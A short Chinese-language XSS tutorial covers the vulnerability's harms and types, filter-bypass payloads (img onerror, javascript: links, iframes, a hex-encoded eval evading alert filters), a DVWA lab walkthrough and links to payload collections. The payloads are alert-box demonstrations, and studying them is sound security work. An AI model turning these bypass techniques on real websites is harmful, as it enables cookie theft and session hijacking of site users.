Xss漏洞
Xss漏洞出現在1996年。Xss漏洞又名跨站腳本漏洞
Xss可能造成的危害
- 網站彈框(刷流量)
- 網站掛馬
- 會話劫持
- Cookie被盜取
- 用戶提權
- 賬號被盜
- 盡量DDOS
- 蠕蟲攻擊
Xss分類
1.儲存型xss
2.反彈型xss
攻擊
注意:當xss攻擊執行不成功的時候,得想辦法判斷他為什么不成功
是被過濾掉了呢,還是沒有閉合對應的標簽。
<script>alert(‘xss’)</script>
0×04 過濾的解決辦法
假如說網站禁止過濾了script 這時該怎么辦呢,記住一句話,這是我總結出來的“xss就是在頁面執行你想要的js”不用管那么多,只要能運行我們的js就OK,比如用img標簽或者a標簽。我們可以這樣寫
<img scr=1 onerror=alert('xss')>當找不到圖片名為1的文件時,執行alert('xss')<a href=javascrip:alert('xss')>s</a> 點擊s時運行alert('xss')<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執行彈窗
常用的攻擊標簽:img、iframe,script,div,style,input,a,math,title等等
Xss過濾表:http://www.freebuf.com/articles/web/153055.html
Xss payload 大全:https://www.jianshu.com/p/3f16269c83db
新型的xss payload在推特關注:xss hack
Xss平台:
以DVWA做個例子,低級->不可能
級別:低級:
描述:無任何過濾
Payload:<script>alert(‘xss’)</script>
Php代碼:
級別:中級
描述:把script標簽過濾了
Payload:<img src=1 onerror=alert(/xss/)>,
Php代碼:
級別:高級
描述:用正則過濾掉scrip
Payload:<img src=1 onerror=alert(/xss/)> 一樣
Php代碼:
不可能級別,把用戶輸入的實體化了,所以沒有xss漏洞。